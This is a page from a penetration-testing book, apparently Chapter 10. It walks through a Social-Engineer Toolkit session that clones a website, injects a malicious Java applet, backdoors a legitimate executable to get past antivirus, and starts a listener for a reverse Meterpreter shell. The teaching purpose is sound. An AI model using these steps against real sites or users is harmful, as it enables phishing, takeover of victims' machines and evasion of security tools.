background image

144

Chapter 10

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com

 Enter the url to clone: 

http://www.secmaniac.com

[*] Cloning the website: http://www.secmaniac.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: 0xvV3cYfbLBI3
[*] Malicious java applet website prepped for deployment

To begin this attack scenario, select 

Website Attack Vectors

   from the 

SET main menu. Use the 

Java Applet Attack Method

  , and then choose 

Site 

Cloner

   from the subsequent menu. Finally, tell SET to clone the SecManiac 

website  .

What payload do you want to generate:

Name:                                      Description:

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send 

back to attacker.

 Enter choice (hit enter for default):

 

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

16. Backdoored Executable (BEST)

 Enter your choice (enter for default):

 

[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: 

no

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...